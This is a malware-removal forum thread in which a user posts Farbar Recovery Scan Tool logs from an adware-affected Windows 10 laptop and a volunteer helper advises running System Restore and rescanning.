2016-02-16 22:41 - 2012-05-30 11:51 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-10 14:18 - 2015-07-10 05:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-10 14:17 - 2013-08-07 12:46 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-10 14:01 - 2013-05-27 17:31 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-07 21:40 - 2010-08-30 21:35 - 00010240 _____ C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
 
==================== Files in the root of some directories =======
 
2016-01-28 17:15 - 2016-01-28 17:15 - 0000047 _____ () C:\Users\Lexi\AppData\Roaming\WB.CFG
2011-03-24 12:02 - 2015-12-07 21:16 - 0000618 _____ () C:\Users\Lexi\AppData\Roaming\wklnhst.dat
2010-08-30 21:35 - 2016-02-07 21:40 - 0010240 _____ () C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-30 18:11 - 2011-09-30 18:11 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00024cb8).exe
2011-12-24 15:45 - 2011-12-24 15:45 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000321b2).exe
2012-01-25 15:47 - 2012-01-25 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00034114).exe
2011-11-01 21:04 - 2011-11-01 21:04 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0003ec41).exe
2011-10-16 11:32 - 2011-10-16 11:32 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00056cd5).exe
2011-08-13 08:55 - 2011-08-13 08:55 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00073fec).exe
2012-01-26 18:05 - 2012-01-26 18:05 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008252c).exe
2011-09-19 14:57 - 2011-09-19 14:57 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008496e).exe
2011-10-15 12:37 - 2011-10-15 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000b8b3e).exe
2011-09-21 21:26 - 2011-09-21 21:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000c73a9).exe
2011-11-10 10:20 - 2011-11-10 10:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00130f9a).exe
2011-08-08 18:26 - 2011-08-08 18:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0018976e).exe
2011-10-20 12:37 - 2011-10-20 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00288d51).exe
2012-01-11 16:26 - 2012-01-11 16:26 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(008db6d3).exe
2011-12-20 17:09 - 2011-12-20 17:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00fc1d83).exe
2011-09-14 17:15 - 2011-09-14 17:15 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(013e5cf4).exe
2011-12-20 02:23 - 2011-12-20 02:23 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(01fc745e).exe
2011-09-11 09:14 - 2011-09-11 09:14 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(026211c7).exe
2011-08-09 13:53 - 2011-08-09 13:53 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(04456972).exe
2011-08-25 12:37 - 2011-08-25 12:37 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(054287ef).exe
2011-09-01 10:44 - 2011-09-01 10:44 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0827ae62).exe
2011-10-02 17:23 - 2011-10-02 17:23 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0a233f94).exe
2011-12-27 20:18 - 2011-12-27 20:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(106fb87b).exe
2011-08-28 06:05 - 2011-08-28 06:05 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(134e6ebe).exe
2012-01-24 15:20 - 2012-01-24 15:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(13f4b968).exe
2012-01-30 16:56 - 2012-01-30 16:56 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1462a399).exe
2011-12-19 00:06 - 2011-12-19 00:06 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1475ab09).exe
2011-08-17 09:36 - 2011-08-17 09:36 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(14c57403).exe
2011-11-15 19:36 - 2011-11-15 19:36 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1bd14184).exe
2011-08-30 08:09 - 2011-08-30 08:09 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1e0d189c).exe
2011-11-22 02:21 - 2011-11-22 02:21 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1fa4da4d).exe
2011-12-31 02:31 - 2011-12-31 02:31 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2138ca7d).exe
2012-01-18 10:47 - 2012-01-18 10:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(23633e70).exe
2012-01-20 11:14 - 2012-01-20 11:14 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2dc97e34).exe
2011-08-23 22:07 - 2011-08-23 22:07 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(365b465f).exe
2011-10-11 17:07 - 2011-10-11 17:07 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(386da867).exe
2011-08-24 08:46 - 2011-08-24 08:46 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38a4d5bf).exe
2011-11-26 23:50 - 2011-11-26 23:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38da5692).exe
2011-11-28 06:12 - 2011-11-28 06:12 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(3f5e903a).exe
2011-10-13 15:47 - 2011-10-13 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(42715212).exe
2011-11-29 23:40 - 2011-11-29 23:40 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(48441ffa).exe
2012-01-08 22:18 - 2012-01-08 22:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(4eaa8c83).exe
2012-01-11 01:03 - 2012-01-11 01:03 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(598e1f87).exe
2011-12-03 12:09 - 2011-12-03 12:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(5a656a9f).exe
2011-12-05 16:58 - 2011-12-05 16:58 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(65babd0e).exe
2011-12-06 19:09 - 2011-12-06 19:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(6b589e26).exe
2011-12-14 21:46 - 2011-12-14 21:46 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(951b3e56).exe
2010-09-04 17:23 - 2010-10-02 09:49 - 0000000 _____ () C:\Users\Lexi\AppData\Local\Okaducenafi.bin
2010-09-04 17:23 - 2010-10-02 15:59 - 0000120 _____ () C:\Users\Lexi\AppData\Local\Vvoqitamewiga.dat
2014-08-29 14:20 - 2014-08-29 14:20 - 0000000 _____ () C:\Users\Lexi\AppData\Local\{56FEC2D8-8D9A-4EBB-8F41-2EA297B30509}
2011-01-22 13:59 - 2011-01-22 13:59 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2011-07-02 19:22 - 2011-07-02 19:22 - 0000188 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
 
Files to move or delete:
====================
C:\Users\Lexi\FileThisDesktopInstaller.exe
 
 
Some files in TEMP:
====================
C:\Users\Lexi\AppData\Local\Temp\Foxit Updater.exe
C:\Users\Lexi\AppData\Local\Temp\GLB1A2B.EXE
C:\Users\Lexi\AppData\Local\Temp\Runner.exe
C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll
C:\Users\Lexi\AppData\Local\Temp\_is9FE4.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-03-07 13:33
 
==================== End of FRST.txt ============================
 

malwarfirsttime.txt

sfcdetails.txt

Addition.txt

Link to post
Share on other sites

Hello and welcome to Malwarebytes,

Please be aware the following P2P/Piracy Warning is a standard opening reply made here at Malwarebytes, we make no accusations but do make you aware of Forum Protocol....

If you're using Peer 2 Peer software such as uTorrent, BitTorrent or similar you must either fully uninstall them or completely disable them from running while being assisted here.Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.If you have illegal/cracked software, cracks, keygens etc. on the system, please remove or uninstall them now and read the policy on Piracy.


Anyone other than the original starter of this thread please DO NOT follow the instructions and advice posted as replies here, my help and advice is NOT related to your system and will probably cause more harm than good...
 

I doubt very much that Malwarebytes has damaged your system, as a tool it will not remove or alter any system files. Your system is definitely still infected, as some mentioned services are not working I`d like you to run System Restore before we go any further..

 

Go to this link: http://www.tenforums.com/tutorials/4588-system-restore-windows-10-a.html Use Option two and restore back to a previous date. FRST has listed restore points that have been found, use the date i`ve listed in red...

 

==================== Restore Points =========================

26-02-2016 16:51:34 Scheduled Checkpoint
03-03-2016 23:14:19 Removed Storia.
07-03-2016 12:51:40 Restore Operation

 

When that is completed and the system has rebooted run FRST again and post the two fresh logs....

 

Run FRST one more time, ensure all boxes are checkmarked under "Whitelist" but only Addition.txt under "Optional scan" Select scan, when done post the new logs....

 

Thanks,

 

Kevin....
 

Link to post
Share on other sites

Thank you so much for your help.  I am sorry for the long wait.  I ran FRST again and this time I only got one log:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by Lexi (administrator) on DURABLE (08-03-2016 22:48:09)
Running from C:\Users\Lexi\Downloads
Loaded Profiles: Lexi (Available Profiles: Lexi & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
() C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatcher.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe
(Amazon Digital Services, LLC.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe
(LG Electronics) C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(Sun Microsystems, Inc.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\LocalServiceJre\bin\AmazonCloudDriveW.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ActionUriServer.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16174328 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411840 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [505696 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [508216 2009-07-28] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [913720 2010-03-25] (TOSHIBA Corporation)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1489760 2010-04-06] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [705368 2010-02-23] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [238080 2009-10-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [709976 2010-02-05] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [595816 2010-03-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [35672 2010-03-03] (TOSHIBA Corporation)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-06-12] (Synaptics Incorporated)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2009-12-25] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2010-03-04] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [352256 2010-02-22] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252728 2010-03-17] (TOSHIBA)
HKLM-x32\...\Run: [NortonOnlineBackupReminder] => C:\Program Files (x86)\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe [529256 2009-08-10] (Toshiba)
HKLM-x32\...\Run: [secure Online Account Numbers] => C:\Program Files (x86)\Discover\SOAN\DiscoverSOAN.exe [376832 2010-03-05] (Orbiscom Ltd. All rights reserved.)
HKLM-x32\...\Run: [brMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [scanSnap WIA Service Checker] => C:\windows\SSDriver\fi5110\SsWiaChecker.exe
HKLM-x32\...\Run: [Monitor] => C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe [118272 2014-07-11] (LeapFrog Enterprises, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-07-05] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [421736 2011-08-19] (Apple Inc.)
HKLM-x32\...\Run: [bYRUA_AGENT] => C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe [380024 2012-09-24] (LG Electronics)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1085656 2015-12-13] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [GoogleChromeAutoLaunch_AC2BF96DE3E4AFDBE25411FD527B2AD1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [746648 2016-02-17] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [FileThis Fetch] => C:\Program Files (x86)\FileThis\FileThis Fetch\FileThis Fetch.exe [350208 2013-05-24] (FileThis)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-05-28] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [skitch] => C:\Program Files (x86)\Evernote\Skitch\Skitch.exe [4304704 2013-08-09] (Evernote)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => No File
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Unbox.lnk [2012-12-12]
ShortcutTarget: Amazon Unbox.lnk -> C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe (Amazon.com)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk [2010-09-24]
ShortcutTarget: Audible Download Manager.lnk -> C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe (Audible, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\BodyMedia Sync.lnk [2013-01-17]
ShortcutTarget: BodyMedia Sync.lnk -> C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe (BodyMedia, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CardMinder Viewer.lnk [2011-07-19]
ShortcutTarget: CardMinder Viewer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conversion to PDF with ScanSnap Organizer.lnk [2011-07-19]
ShortcutTarget: Conversion to PDF with ScanSnap Organizer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk [2013-05-28]
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Cloud Drive.lnk [2016-03-08]
ShortcutTarget: Amazon Cloud Drive.lnk -> C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe (Amazon Digital Services, LLC.)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2015-07-31]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0377792b-7629-45e2-ae76-3047b41ccf06}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{69348f7a-a204-4307-bdbe-d51a41143651}: [DhcpNameServer] 10.0.5.3 10.0.5.2

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSNA&bmod=TSNA
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://www.google.com/calendar/render?hl=en&tab=wc&gsessionid=pOBMFiDq2Uvgtsn9Tik9KQ
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.facebook.com/
hxxps://www.google.com/calendar/render?hl=en&tab=wc&pli=1&gsessionid=OK
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
